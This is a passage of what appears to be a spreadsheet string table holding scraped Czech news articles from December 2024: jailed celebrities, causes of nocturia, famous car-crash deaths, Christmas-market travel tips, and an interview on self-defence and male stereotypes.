    <t>11120</t>
  </si>
  <si>
    <t>20241201_271_3474600959_2341355f83b81e9a531c.html</t>
  </si>
  <si>
    <t>2341355f83b81e9a531c</t>
  </si>
  <si>
    <t>Slavní hříšníci: Které celebrity skončily v minulosti za mřížemi?</t>
  </si>
  <si>
    <t>Slavní hříšníci: Které celebrity skončily v minulosti za mřížemi? Známe je jako talentované, úspěšné a bohaté, i oni si však prošli temnějším obdobím, na které nevzpomínají zrovna rádi. Některé celebrity se totiž dostaly do konfliktu se zákonem a skončily za mřížemi. Důvody byly různé – od napadení, drog po smrtelné nehody. Kdo se v minulosti nevyhnul vězení? Sedmasedmdesátiletá herečka, která v loňském roce zazářila ve filmu Tancuj, Matyldo, strávila ve vazbě jedenáct měsíců. V roce 1998 byla obviněna z toho, že se podílela na vytunelování společnosti Skloexport . Hrozilo jí až dvanáct let vězení. Během pobytu ve vazbě se herečce výrazně zhoršilo zdraví, byla jí diagnostikována roztroušená skleróza. Z toho důvodu byla nakonec vyšetřována na svobodě a v roce 2013 její případ ukončila amnestie bývalého prezidenta Václava Klause . VIDEO: Dramatický život mimořádné herečky Reginy Rázlové První smrtelné nehody se Jiří Schmitzer dopustil v roce 1976, kdy se svým otcem Jiřím Sovákem natáčel film Marečku, podejte mi pero!. Tehdy v noci opustil divadelní klub v Ústí, sedl za volant a srazil chodce. Soud následně rozhodl, že šlo o zabití z nedbalosti, herec měl v krvi navíc alkohol , a tak byl odsouzen ke třem letům ve vězení. Tragická nehoda byla i jedním z důvodů, proč se s ním jeho otec už nikdy nebavil a vydědil ho. Za dobré chování byl propuštěn po roce a půl. Druhou smrtelnou nehodu způsobil v roce 1980, kdy se se třemi přáteli vracel ze svatby. Také v tomto případě hrál roli alkohol . Při projíždění zatáčky řízení nezvládl, vjel do silničního příkopu, odkud se vozidlo odrazilo a došlo k nárazu na sloup veřejného osvětlení. Sám Smitzer žádné zranění neutrpěl, jeden ze spolujezdců byl zraněn jen povrchově, další však ve věku třiadvaceti let nehodu nepřežil. Za svou vědomou nedbalost byl Schmitzer následně potrestán čtyřletým odnětím svobody. Nakonec si odseděl dva a půl roku. Neštěstí, které si musel odpykat ve vězení, postihlo také zpěváka Martina Maxu . Na vojně zastřelil kvůli své vlastní chybě kolegu a musel si tak ve vězení rok odsedět. V roce 2006 dostal podmínku za rvačku a v roce 2017 byl vyšetřován kvůli údajnému napadení muže a ženy. Následně se ukázalo, že k ničemu takovému nedošlo. Kvůli tomuto obvinění však zpěvák přišel o mnoho pracovních příležitostí a rozpadla se mu rodina. Jan Révai byl v devatenácti odsouzen k dvěma letům ve vězení. Pokoušel se splatit dluhy, které měl z hraní na automatech, a přepadl benzinovou stanici. Kromě toho se také podílel na vykrádání aut. Čas, který strávil herec ve vězení, se snažil co nejlépe využít, a tak poctivě cvičil a věnoval se tanci. Také herec Robert Downey Jr. byl pěkné kvítko! V devadesátkách byl několikrát zatčen za trestné činy spojené s držením drog. V roce 1996 to bylo za kokain, heroin a extázi a navíc za nošení střelné zbraně. O rok později strávil šest měsíců ve vězení v Los Angeles za to, že se nedostavil k testu na drogy. Když se situace opakovala, byl v roce 1999 odsouzen na tři roky. Nakonec byl po necelém roce propuštěn. Problém se zákonem měla i jedna ze Zoufalých manželek. Felicity Huffman byla v roce 2019 odsouzena za podvod. Zaplatila totiž patnáct tisíc dolarů za to, že její dcera získala lepší skóre ve zkoušce SAT, což je jeden z nejvýznamnějších standardizovaných testů používaných pro přijímání studentů na vysoké školy v USA . Chtěla, aby se její dcera dostala snáze na vysněnou školu a nenapadlo by ji, jakou to bude mít dohru. Felicity byla odsouzena ke dvěma týdnům vězení, nakonec si odpykala jedenáct dní. V roce 1980 byl Paul McCartney zatčen na tokijském letišti za držení většího množství marihuany. Muzikant byl obviněn z pašování, což mu mohlo vynést až sedm let za mřížemi. V tamním vězení strávil nakonec pouhých devět dní, než byl deportován zpět do Anglie . V květnu 2007 byla hotelová dědička odsouzena ke 45 dnům vězení za porušení podmínek zkušební doby vyplývající z řady dopravních přestupků. Nastoupila do ženské věznice v Lynwoodu v Kalifornii , aby si tam odpykala svůj trest. Nakonec však byla propuštěna po 19 dnech. V roce 1988 napadl herec muže jménem Johnny Trinh. Za napadení a ublížení na zdraví se zbraní dostal 90 dní trestu, nakonec si odpykal jen půlku. Později požádal, aby byla tato událost vyškrtnuta z jeho záznamu. Muž, kterého Mark napadl, mu nakonec také odpustil. Videohub Dramatický život mimořádné herečky Reginy Rázlové profimedia.cz herminapress.cz CNC_Martin hykl Herminapress.cz Slavní hříšníci: Které celebrity skončily v minulosti za mřížemi? Jan Révai Jiří Schmitzer Regina Rázlová Martin Maxa Robert Downey Jr. Felicity Huffman Mark Wahlberg Paris Hilton Paul McCartney Autor: Veronika Matoušková Autor person Ivana Štědrá Rubrika transition_slide Ze života hvězd</t>
  </si>
  <si>
    <t>472370</t>
  </si>
  <si>
    <t>529690</t>
  </si>
  <si>
    <t>20241201_272_3474606761_e20173f26905d51ed5b9.html</t>
  </si>
  <si>
    <t>e20173f26905d51ed5b9</t>
  </si>
  <si>
    <t>Budíte se často v&amp;nbsp;noci, protože se vám chce na malou? Příčinou nemusí být jen to, že hodně pijete</t>
  </si>
  <si>
    <t>Budíte se často v&amp;nbsp;noci, protože se vám chce na malou? Příčinou nemusí být jen to, že hodně pijete Klidný noční spánek je důležitý, člověk ho nutně potřebuje pro regeneraci celého organismu. Jenže co když vás až příliš často budí plný močový měchýř a nutí vás opakovaně běhat na toaletu? Tento nepříjemný problém může mít celou řadu příčin a některé vás možná překvapí. Co s tím můžete udělat? Článek Následuje obsah vložený z jiného webu. Zde jej můžete přeskočit. Přejít před obsah vložený z jiného webu. Článek si také můžete poslechnout v audioverzi. Šouráte se uprostřed noci už po několikáté potmě na záchod a cestou přemýšlíte, proč vás měchýř nenechá pořádně vyspat… Je to stresem , věkem, nebo dokonce nějakou nemocí anebo jste prostě jen večer vypili víc tekutin, než vaše tělo zvládne vyloučit ještě před ulehnutím? Je jasné, že takové noční výpravy na náladě moc nepřidají, přerušovaný spánek se nevyhnutelně podepíše na vaší náladě, energii i celkovém zdraví. Pokud vás potíže s nočním močením obtěžují delší dobu a stav se nelepší, kontaktujte lékaře, aby vás vyšetřil. Rozhovory 24. 11. 2022 Po 50 dvě návštěvy WC za noc nic neznamenají, ale na kontrolu by zajít měli, vzkazuje mužům urolog Proč chodíte v noci často na malou? Problém častého nočního nucení na močení (odborně nykturie ) může mít mnoho příčin, některé vás napadnou samozřejmě, jiné už tak zřejmé být nemusí. Velmi lehké spaní. Možná spíte jako na vodě a snadno vás probudí jakýkoli hluk nebo třeba partner, když se na posteli otočí nebo do vás ve spánku strčí. Proberete se a vzápětí si uvědomíte, že potřebujete čurat. Příliš tekutin před spaním. Příčina nykturie může být zcela prozaická: ve večerních hodinách nebo těsně před usnutím vypijete příliš tekutin. Abyste minimalizovali riziko nočního buzení kvůli močení, je vhodné omezit příjem tekutin zhruba dvě až tři hodiny před ulehnutím . Spánková apnoe . Jedná se o nebezpečné pauzy v dýchání během spánku, kdy vás mozek donutí procitnout, abyste se nadechli – a vy zároveň zjistíte, že máte plný močový měchýř. Zvětšená prostata . Projevuje se tím, že se muž nedokáže úplně vymočit, má slabý proud moči. Musí často na toaletu, a to i v noci, a močení je obtížné i bolestivé. S nutkáním chodit častěji na záchod mohou mít souvislost také různé neurologické poruchy a velmi často je za ním též infekce močových cest či zánět močového měchýře . A jaké jsou další příčiny nykturie? MUDr.ování 22. 2. 2023 Čůrání v morseovce aneb Co pro muže znamená prostata a proč nechodit na vyšetření po cyklovýletu Foto: New Africa, Shutterstock.com Příčinou častého nočního močení může být i porucha funkce ledvin, cukrovka nebo neurologické onemocnění Foto: New Africa , Shutterstock.com Dlouhodobý stres Dlouhodobý stres může významně ovlivnit činnost močových cest a přispívat k častému nočnímu buzení. Stres aktivuje sympatický nervový systém (ten reguluje mnoho tělesných funkcí mimo vědomou kontrolu), což může vést ke zvýšenému napětí svalů měchýře a zhoršené schopnosti plně ho vyprázdnit během dne. Výsledkem je časté nutkání na močení, které se pak projevuje i v noci. Navíc stres narušuje spánkový cyklus a zvyšuje hladinu hormonu kortizolu , což může způsobit, že i menší množství moči v měchýři spustí akutní potřebu návštěvy toalety. Tento začarovaný kruh nejenže snižuje kvalitu spánku, ale přispívá k větší únavě a zhoršení celkové psychické pohody. Přerušovaný spánek je horší než jeho nedostatek Foto: Stock-Asso, Shutterstock.com Dvě až tři hodiny před spaním je dobré omezit příjem tekutin Foto: Stock-Asso , Shutterstock.com Cukrovka i nemoci ledvin Na frekvenci nočního močení mohou mít významný vliv poruchy a onemocnění ledvin . Zdravé ledviny regulují množství moči v těle tak, aby se její tvorba během spánku snížila. Při chronických onemocněních ledvin nebo když dojde k jejich poškození cukrovkou , může dojít k narušení této schopnosti a výsledkem je nadměrná produkce moči ve spánku. Navíc zhoršená ledvinová funkce může způsobit zadržování vody během dne a i to zvyšuje potřebu močit v noci. MUDr.ování 3. 8. 2022 Nezadržovat čůrání, po sexu na záchod a místo mýdla vodu aneb Jak předcházet zánětům močových cest Hyperaktivní močový měchýř Syndrom hyperaktivního močového měchýře se projevuje náhlým, často nekontrolovatelným nutkáním na močení, a to i v případě, že měchýř není plný. Mezi typické příznaky patří naléhavé nutkání, časté močení , noční buzení kvůli potřebě, někdy dokonce i únik moči. Příčinou tohoto stavu může být nadměrná aktivita svalů stěny močového měchýře, nervové poruchy, infekce močových cest, stres a některé léky. Nykturie: Jak si pomoci při častém nočním močení Vyprazdňujte močový měchýř pravidelně během dne s určitou frekvencí, nečekejte „na poslední chvíli“. Během večera nepijte víc než 300 až 400 ml tekutin , vyhněte se přitom alkoholu a nápojům s kofeinem či cukrem, mohou zvyšovat tvorbu moči. Většinu tekutin se snažte přijmout v průběhu dne (nikoli až večer) a doplňujte je pravidelně. Není správné vypít jednorázově větší množství a poté několik hodin nepít nic. Omezte konzumaci slaných potravin , a to zejména večer. Obsahují příliš sodíku , který vyvolává žízeň, tedy zvyšuje příjem tekutin, a tudíž i objem moči. Zlepšete spánkovou hygienu. Čím je váš spánek hlubší , tím menší je pravděpodobnost, že vás vzbudí nutkání k močení. Udržujte v ložnici optimální teplotu, větrejte, před spaním se vyvarujte modrého světla, uléhejte každý den ve stejnou dobu, nejezte na noc těžká jídla. Jak poznáte, že můžete mít nemocné ledviny? Mezi příznaky patří bolesti zad či otékání Autor: Simona Procházková Autor person Simona Procházková</t>
  </si>
  <si>
    <t>20241201_273_3474650672_a8e5b0cfa23fdfb9dab7.html</t>
  </si>
  <si>
    <t>a8e5b0cfa23fdfb9dab7</t>
  </si>
  <si>
    <t>Ivan Hlinka, Jiří Štaidl nebo princezna Diana: Nejen tyto známé osobnosti se zabily v&amp;nbsp;autě</t>
  </si>
  <si>
    <t>Ivan Hlinka , Jiří Štaidl nebo princezna Diana : Nejen tyto známé osobnosti se zabily v&amp;nbsp;autě Ivan Hlinka , Jiří Štaidl nebo princezna Diana : Nejen tyto známé osobnosti se zabily v autě Foto: Škoda Auto , Novinky.cz Jan Majurník 1. 12. 2024, 5:00 Cestování automobilem je několikanásobně nebezpečnější než třeba létání. Zprávy o tom, že někdo zemřel následkem kolize, čteme několikrát denně. Věděli jste ovšem, že jízda autem se stala osudnou i řadě známých osobností? Vybrali jsme ty české i zahraniční a zjistili, ve kterých vozech jely. Článek Přejít před obsah vložený z jiného webu. Článek si také můžete poslechnout v audioverzi. „A když se hlava bleskově k zemi blíží, to jsi pak rád, žes přežil bez obtíží. Je spoustu takovejch, co kliku neměli, na jejich počest my budem veselí,“ zpívá Daniel Landa v písni Holky a mašiny, kde naráží na kolize spojené s vysokou rychlostí (a opilostí) za volantem. Ovšem nejen chyba řidiče, ale i chyba někoho jiného stála život řadu známých osobností moderních dějin našeho světa. Zapátrali jsme po tom, které české i zahraniční celebrity skonaly v rámci dopravních nehod a ve kterých vozech vlastně seděly. Jiří Štaidl Talentovaný textař Jiří Štaidl miloval rychlou jízdu, která se mu v roce 1973 stala osudnou. Ve svém Renault 17 TL uháněl (údajně) pod vlivem alkoholu na spojnici mezi dálnicí D1 a obcí Říčany , kde jej měl překvapit z vedlejší cesty vyjíždějící nákladní vůz. Foto: Novinky.cz Jiří Štaidl měl rád rychlou jízdu, na kterou ve finále „dojel“. Zprávy popisují, že Štaidl nebrzdil, ale snažil se náklaďáku vyhnout, nicméně došlo ke kontaktu aut a renault skončil na boku. Nepřipoutaný Štaidl byl katapultován z vozu přímo do svodidel, což znamenalo konečnou. Petr Sepeši Bartošová a Sepeši . V osmdesátých letech populární dvojice, kterou rozdělila až sama smrt. Dne 29. července roku 1985 vjel na chráněný železniční přejezd ve Františkových Lázních právě Sepeši , který seděl ve Škodě 100. Dobová policejní zpráva říká, že Sepeši objížděl zavřené závory (měla být silná bouřka a řidič netrpělivý), načež jej na kolejišti srazil motorový vlak a vláčel asi 100 metrů. Umělec zemřel na místě. Foto: Škoda Auto Škoda 100 sice absolvovala historicky první nárazovou zkoušku v Československu , její bezpečnost ovšem nebyla valná. Letos ovšem Deník.cz přinesl zprávu, že se objevil svědek, který tvrdí, že onen přejezd nefungoval už několik dní a přes den byl hlídán pracovníkem železnic. V noci ovšem nikoli… Tomáš Holý Asi nejznámější dětský filmový herec Tomáš Holý svoji životní dráhu rozvíjel až do svých 21 let. V březnu 1990 se Holý (měl být pod vlivem alkoholu ) blížil ve své Škodě 120 k obci Polevsko, kde dostal smyk a narazil do stromu. Jeho nepřipoutaný spolujezdec po nárazu vypadl a přežil, ovšem sám Holý zůstal v autě zaklíněn a upadl do bezvědomí. Pravděpodobně na následky četných vnitřních zranění také skonal, protože se k němu pomoc nedostala včas. Ivan Hlinka Všichni si Ivana Hlinku pamatují jako trenéra národního hokejového mužstva, které v roce 1998 přivezlo z japonského Nagana zlatou olympijskou medaili. Šest let na to mířil Hlinka z Litvínova do Varů ve své Škodě Superb první generace, ovšem asi čtyři kilometry před cílem Hlinkovu škodovku smetla Avia odbočující rychlostí 47 km/h přes plnou čáru na vedlejší silnici. Foto: Škoda Auto Stříbrný Superb byl po Hlinkově nehodě na šrot. Trenér navíc neměl pás. Řidič nákladního vozu, který Hlinkovi jedoucímu 111 km/h nedal přednost, srážku přežil a odnesl si podmínku i zákaz řízení. Hokejový trenér zemřel necelé tři hodiny po převozu do nemocnice. Při nehodě neměl pás, ovšem podle odborníků by mu vzhledem ke zraněním nepomohl. Patrik Stoklasa Dopravní nehoda na 183. kilometru dálnice D1 se mohla stát osudnou dvěma známým osobnostem, ovšem štěstěna se usmála jen na jednu z nich. Zpěvák Karel Černoch kolizi v říjnu 2004 přežil, zatímco mladší a nadějný zpěvák Patrik Stoklasa (účastník Česko hledá SuperStar) nakonec ne. Řidič Mercedesu Vito se slavnou posádkou nejprve narazil do návěsu pomalu jedoucího nákladního vozu, poté strhl řízení a došlo k dalšímu kontaktu. Černoch seděl nepřipoutaný vzadu a utrženými dveřmi vypadl ven. Tehdy přežil, zemřel až v roce 2007 na rakovinu. Foto: Mercedes-Benz Mercedes-Benz Vito se mohl stát osudným i Karlu Černochovi , ovšem jeho nakonec dostihla rakovina. Patrik Stoklasa sedící na místě spolujezdce byl převezen v bezvědomí do nemocnice, kde mu bylo po několika operacích diagnostikované pravděpodobné poškození mozku a šance na přežití stanovena na 10 %. Mladý 22letý zpěvák byl nakonec po čtyřech dnech odpojen od přístrojů. Alexander Dubček Politik, v něhož mnozí lidé před rokem 1968 věřili a který nakonec zvládl i temné období sovětské okupace, zahynul až v září 1992. Jakožto zadní pasažér služebního BMW řady 5 generace E34 mohl jen přihlížet tomu, jak jeho řidič nedokázal ukočírovat smyk ve vysoké rychlosti (pršelo) na dálnici D1 u Humpolce , který měl za následek vymrštění auta z vozovky. Foto: BMW Dubček měl nehodu v pětkovém bavoráku. Nebyl připoutaný a vylétl z auta. Nepřipoutaný Dubček z vozu vyletěl ven, utrpěl vážná zranění a upadl do bezvědomí. Nehodě nakonec podlehl až 7. listopadu v Praze . Kolem jeho smrti se motají konspirační teorie, jedna z nich míří i na jeho tehdejšího politického rivala Mečiara. Diana Frances Spencer Můžete ji znát jako princeznu Dianu nebo princeznu z Walesu . Její smrt na zadních sedadlech Mercedesu S 280 byla nesmírně zbytečná a způsobená chybou podnapilého řidiče, který v létě 1997 ujížděl před paparazzi. Vůz ve vysoké rychlosti narazil do zdi pařížského tunelu. Diana sedící vzadu utrpěla vážná zranění, která nebyla slučitelná se životem. Naposledy ovšem vydechla až v nemocnici, kam ji stačili převézt. George Smith Patton Pomohl vyhrát druhou válku a osvobodit Evropu , ovšem poválečné slávy si čtyřhvězdičkový generál dlouho neužil. Dne 9. prosince 1945 Pattonův štábní Cadillac vjíždí na křižovatku na předměstí Mannheimu , kde se střetává s vojenským nákladním autem. Foto: Jeep George S. Patton zemřel nedlouho po konci druhé světové války. Z celé posádky utrpěl zlomeninu krčních obratlů a vážné zranění míchy právě Patton , což mělo za následek ochrnutí a potíže s dýcháním. Všechno pak skončilo 21. prosince téhož roku kvůli plicní embolii. Dodnes se nicméně o nehodě mluví jako o možné vraždě. Ryan Dunn Herec a kaskadér Ryan Dunn sice nebyl tak známý jako například Paul Walker , ale všichni, kteří se bavili nad podivnými kousky aktérů série Jackass, jej zaručeně znali. V červnu 2011 se údajně opilý Dunn vydal ve svém Porsche 911 GT3 z roku 2007 na cestu městským okrskem West Goshen nedaleko Filadelfie . Americký herec nezvládl řízení, vyletěl ze silnice a narazil do stromu, což vyústilo v požár. Poškození i oheň byly natolik fatální, že usmrtily jak Dunna , tak jeho spolujezdce. Tito jmenovaní samozřejmě nebyli jediní. Ze zahraničních osobností se dopravní nehoda stala osudnou celebritám typu Paul Walker , James Dean , Michael King , Christian Oliver nebo Falco. Z českých jde například o Evu Čeřovskou , Zdeňka Jánoše , Jakuba Macka nebo Karla Koželuha . Diskuze Autor: Jan Majurník Autor Jan Majurník</t>
  </si>
  <si>
    <t>224600</t>
  </si>
  <si>
    <t>296630</t>
  </si>
  <si>
    <t>20241201_274_3474621230_8c56fc882e25eebffbdc.html</t>
  </si>
  <si>
    <t>8c56fc882e25eebffbdc</t>
  </si>
  <si>
    <t>Vychutnejte si advent bez davů...</t>
  </si>
  <si>
    <t>Vychutnejte si advent bez davů... Poznaň (Profimedia.cz, Invia.cz) Vychutnejte si letos kouzlo předvánočního času v některém z nejkrásnějších a méně známých evropských měst, kde Vánoce dostávají jedinečný nádech. Projděte se jejich uličkami zahalenými do svátečních světel a vychutnejte si atmosféru, kterou jindy nezažijete. Nechte se zlákat vůní svařeného vína a pečených kaštanů, okouzlujícími ozdobami i výhledy na zasněžené vrcholky hor. Polsko , Švýcarsko nebo třeba Alsasko v tento čas srší doslova pohádkovou náladou. Poznaň – Polsko Doporučit lze i jedno z nejstarších a nejmalebnějších měst Polska , Poznaň , které se pyšní vyhlášenými trhy v historickém centru s tradičním jídlem a živou hudbou či divadelními představeními. „Zatímco Krakov či Vratislav navštěvují davy turistů, Poznaň nabízí klidnější a intimnější prostředí, kde vánoční atmosféra dýchá autentičností. Nejenže si při procházce nazdobeným městem odpočinete, ale můžete navštívit i řadu kulturních a historických památek. Při návštěvě rozhodně doporučuji nevynechat Staré město a Tumský ostrov s katedrálou sv. Petra a Pavla, Muzeum historie nebo knihovnu Raczynských,“ láká Jiřina Ekrt Jirušková. Štrasburk – Francie Štrasburg • Profimedia.cz, Invia.cz Také Štrasburk se může pochlubit svými trhy, které jsou jedněmi z nejstarších v Evropě a každoročně rozprostírají v malebných středověkých uličkách. „Alsaské trhy mají hluboké kořeny, jejichž historie sahá více než 400 let zpět. Mezi stovkami různých pochutin můžete ochutnat i místní speciality, jako jsou bredle, bretzel nebo vyhlášená alsaská vína ,“ doporučuje tisková mluvčí Invia a dodává, že za navštívení rozhodně stojí také vyhlášená katedrála Notre-Dame , která je jedním z nejikoničtějších míst v celé Evropě . Více tipů najdete v tištěném APŽ číslo 48. Autor: Lenka Dostálová Autor person Lenka Dostálová</t>
  </si>
  <si>
    <t>20241201_275_3474621452_78324e42491f8c7bca2a.html</t>
  </si>
  <si>
    <t>78324e42491f8c7bca2a</t>
  </si>
  <si>
    <t>Pavel Houdek: I muži potřebují sebeobranu. Často jsou terčem násilí, kterému by šlo předejít Pavel Houdek FOTO: Pavel Houdek / se souhlasem FOTO: Pavel Houdek / se souhlasem Rozhovory 1. 12. 2024 ROZHOVOR / „Zatímco u žen se už otevírá diskuze o tom, že tradiční obraz ženství není jediný správný a že ženství může mít různé podoby, u mužů to tak není. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života,“ říká právník, kriminolog a spoluzakladatel Moderní sebeobrany Pavel Houdek. V rozhovoru pro deník FORUM 24 popisuje, jak ženy a muži přistupují k násilí, proč i muži potřebují sebeobranu a proč mohou být představy o tradičním mužství nebezpečné. Když se mluví o sebeobraně, plno lidí si možná představí, že se týká hlavně žen. Ale co muži? Samozřejmě i muži potřebují sebeobranu. Jenže si často představíme stereotyp, že muž jde po ulici, někdo do něj vrazí ramenem, on se otočí, ten druhý do něj začne strkat a nakonec ho udeří. Nebo si představíme situaci v hospodě, kdy někdo přijde, strčí do vás a řekne: „Ty jsi mi rozlil pivo , pojď ven!“ Pak jdete ven a tam začne nějaké postrkování. Ale tohle jsou právě příklady násilí, které ve většině případů nemusí skončit fyzickým střetem. A právě tady je sebeobrana paradoxně užitečná. Ne však ta tradiční, kterou si představíme – že se někdo učí bojovat. Ale taková sebeobrana, která vás naučí vůbec se do takové situace nedostat. Respektive pokud už k ní dojde, jaké strategie a taktiky použít, abych se konfliktu vyhnul a neskončil ve rvačce. Jasně, člověk se potřebuje umět ubránit i fyzicky, protože všechny preventivní kroky nemusí vždy fungovat. Ale víme, že téměř všechno násilí je tzv. sociální, a tedy téměř vždy se mu dá předcházet. Liší se sebeobrana pro ženy a pro muže? Určitě liší. Neliší se samotné fyzické jádro, ale dvě věci: situace, do kterých se muži a ženy můžou dostat, a způsob, jak k násilí přistupujeme. Ženám mnohem častěji hrozí sexualizované obtěžování nebo násilí. I když se stále více ukazuje, že rozdíl mezi muži a ženami v této oblasti není tak velký, jak si myslíme. Sexualizované obtěžování a násilí vůči mužům je nahlašováno ještě mnohem méně často než u žen. Liší se tedy druh ohrožení a také to, jak k němu muži a ženy přistupují. To souvisí s výchovou a s naším sebeobrazem. Právě v těchto dvou oblastech vidím největší rozdíly. Jak se tedy přístup mužů a žen liší? Celý život jsme vychováváni jinak, což má zásadní vliv na to, jak k násilí přistupujeme. Kluky od malička v konfliktech spíš povzbuzujeme. Když se začnou třeba prát s klacky, řekneme: „Kluci jsou kluci, to je normální.“ Ale když něco podobného udělají holčičky, řekneme jim: „Nedělej to, umažeš se, zničíš si šaty, nikdo tě pak nebude chtít.“ A tohle pokračuje až do dospělosti. Když muž vstoupí do konfliktu – a teď nemyslím nutně jen rvačku v hospodě, ale jakýkoliv konflikt – často to vnímáme pozitivně. Říkáme, že je rozhodný, průbojný, že si dokáže stát za svým. Když to ale udělá žena, často na ni pohlížíme jinak, jako na hysterickou, nebo že se chová jako „babochlap“. Když tohle slyšíme celý život, odráží se to na tom, jak ke konfliktu přistupujeme. V důsledku to znamená, že ženy jsou socializované k tomu, aby si spíš nechaly věci líbit. Když dojde k nepříjemné situaci, očekává se od nich, že použijí „ženský způsob řešení“, tedy usmát se, neeskalovat, vyhnout se přímé konfrontaci. Muži jsou naopak povzbuzováni ke konfliktu. A pokud by si muž něco nechal líbit, okolí na něj reaguje negativně a ženskou roli či nálepku („jsi baba“) používá jako urážku. To pak vede k tomu, že muži jsou mnohem častěji terčem nebo obětí násilí, kterému by šlo relativně snadno předejít. Jenže nejsme učeni konfliktu předcházet, učíme se ho vyhrotit. To je přesně ten typ situace rvačky v hospodě. Teoreticky by si každý řekl, že se ven prát nepůjde, ale v reálné situaci si pak většina lidí řekne: „Přece si to nenechám líbit, nebudu za slabého. Když mě někdo vyzve a půlka hospody se na mě dívá, tak jak bych vypadal?“ Nikdo nechce vypadat jako zbabělec. Ale to jsou případy, které končí tragicky. Opačně to funguje u žen, které se nebrání, protože si řeknou: „Co si o mně pomyslí? Budou mě považovat za hysterku, za problémovou.“ A pak se za sebe nepostaví vůbec a nechají si líbit i zacházení, které je dávno za hranou. Jsou stereotypy ve společnosti stále silně přítomné? Jednoznačně, a u mužů to je výrazně silnější než u žen. Je i taková akademická teze, že pokud jde o násilí, zejména sexualizované násilí, tak otázka mužská je zhruba o dvacet let a víc za otázkou ženskou. U spousty témat spojených se stereotypy, které dopadají na ženy, už proběhla určitá společenská diskuze – feministické nebo ženské hnutí je otevřelo a stala se z nich aktuální témata. Například už není považováno za nutné nebo žádoucí, aby existoval jen jeden standard nebo ideál krásy. Je běžné, že na obálkách časopisů nebo v reklamách se objevují ženy s různými typy postav, váhou i vzhledem. Vidíme modelky s různými těly a rysy, a to i u značek, které prodávají spodní prádlo nebo kosmetiku. Ale u mužů tohle vůbec není téma. Když se podíváte na mužské časopisy, na obálce vždycky najdete stejný typ – je to muž s pěti procenty tělesného tuku, vyrýsovanými svaly a podobně. A tohle je jen jeden příklad z mnoha, který ilustruje, jak moc zaostáváme. Zatímco u žen se už otevírá diskuze o tom, že tradiční obraz ženství není jediný správný a že ženství může mít různé podoby, u mužů to tak není. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života. Jaký vliv to tedy na muže má? Víme ze statistik, že jsou rozdíly mezi muži a ženami například v délce života. Ženy se dožívají výrazně vyššího věku než muži. Víme, že muži výrazně častěji páchají sebevraždy, mají častější duševní problémy a potíže. A tohle všechno jsou dopady spojené se stereotypy, které nás provázejí celý život. Máme tu obraz „macho chlapa“, který všechno zvládne sám, nikoho svými problémy nezatěžuje. A to má velmi konkrétní dopady. Když nejsme zvyklí mluvit o svých problémech, tak logicky mnohem méně často vyhledáváme pomoc, třeba terapii. Kvůli tomu pak máme vyšší míru psychických onemocnění a také vyšší míru sebevražd. Další věc je prevence. Muži ji často zanedbávají, protože si myslí, že si zvládnou poradit sami, nebudou si stěžovat, nebudou chodit k doktorovi. A když už nakonec k doktorovi jdou, tak je třeba pozdě. To jsou jen některé příklady, jak stereotypy dopadají na zdraví. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života. Je tady také představa, že ženy jsou přirozeně lepší ve schopnosti postarat se o dítě. To vede k tomu, že při rozvodech děti ve většině případů automaticky zůstávají u matky, aniž by se zkoumalo, kdo z rodičů je pro péči vhodnější. Jak jsem říkal, jsme v oblasti mužských práv a rolí o několik desetiletí pozadu za ženským hnutím. A jsme teprve na začátku fáze, kdy začínáme některé věci zpochybňovat. Ale hned se na nás snáší kritika, podobně jako kdysi na ženy, které začaly zpochybňovat ideály krásy. Byly obviňovány, že prostě nemohou splnit očekávání, a tak jen plivou na ten ideál. My muži jsme na tom podobně. Když začneme zpochybňovat mužské stereotypy, slyšíme: „Ty nejsi dost chlap. Nejsi dost silný. Nejsi dost mužný.“ Tahle reakce tu byla, je a bude. A všechno, čím prošlo ženské hnutí, nás teprve čeká. Tyhle stereotypy můžeme do určité míry vidět i v politice, například u Donalda Trumpa nebo u nás u Filipa Turka . A z výsledků voleb víme, že to rezonuje třeba u mladých mužů poměrně dost. Čím to je? Myslím, že tam hraje roli to, že ženské hnutí je hodně vidět. Po desetiletích práce začíná přinášet jasné výsledky a měnit společnost. Ženy pomalu, ale jistě dosahují cílů, které si vytyčily – bourají skleněné stropy, získávají příležitosti ve vedení firem, v politice a podobně. Mají dnes výrazně více možností. A jakmile ty možnosti mají, logicky je využívají. Například před sto lety jsme ženám umožnili studovat a dnes vidíme výsledky: ženy začínají mít lepší studijní výsledky, lépe zvládají přijímací zkoušky a dnes většinu vysokoškolských studentů tvoří ženy. Roste jejich zastoupení i v technických oborech. To vede k tomu, že ženy jsou samostatnější, mají více možností. Tím pádem se mění i tradiční mužská role. Dřív byl muž vnímán jako chlapák, živitel rodiny, lídr, ten, kdo všechno řídí. Jenže tohle mizí a mužská role je zpochybněná. Jsou na to dvě možné reakce. První je přizpůsobit se, říct si: „Doba se mění, ženy mají více příležitostí. Nemám už automatická privilegia, která měl můj dědeček, protože on byl jediný, kdo vydělával, zatímco babička byla celý život doma.“ Druhá reakce je začít naříkat, upnout se k minulosti a stereotypům. Když jste zmínila Donalda Trumpa – ano, on je symbolem tohohle přístupu. Má za sebou historii kontroverzních sexuálních výroků a chování. Ale vidíme to i v takzvané manosféře – mezi influencery jako Andrew Tate a dalšími, kteří šíří mnohem vyhrocenější a nebezpečnější postoje. Tihle lidé jsou otevřeně misogynní, nenávistní a násilní. Přitahují část mladých mužů, kteří na sobě nechtějí pracovat, nechtějí se rozvíjet a mají pocit, že za jejich neúspěchy mohou ostatní. A když se objeví někdo jako Andrew Tate, kdo jim řekne: „Za to můžou ženy. Ony tě mají poslouchat!“ – tak na to někteří slyší. Jak se dají stereotypy odbourávat? Vy jste říkal, že muži jsou v tomhle o 20 let za ženami, znamená to, že podle vás k tomu dospějeme časem? Myslím, že ano, protože moc nevidím jinou cestu. Jsou tu dvě možnosti. První je ta manosférická, tedy že bychom rozpoutali nějakou válku mezi pohlavími, nasadili ženám obojek a připoutali je zpátky do kuchyně. To se podle mě nestane, nicméně mohou přijít nějaké dílčí propady – ostatně vidíme to třeba v Americe , kde se práva, která jsme považovali za univerzálně lidská, jako například právo na potrat, dostávají pod tlak některých politických směrů. Druhá, pravděpodobnější cesta je ta, že emancipaci společnost dotáhne dokonce. A tím nemyslím jen ženskou emancipaci, protože ta pořád není dotažená – máme tu stále spoustu problémů, například otázku sexualizovaného násilí – ale i tu 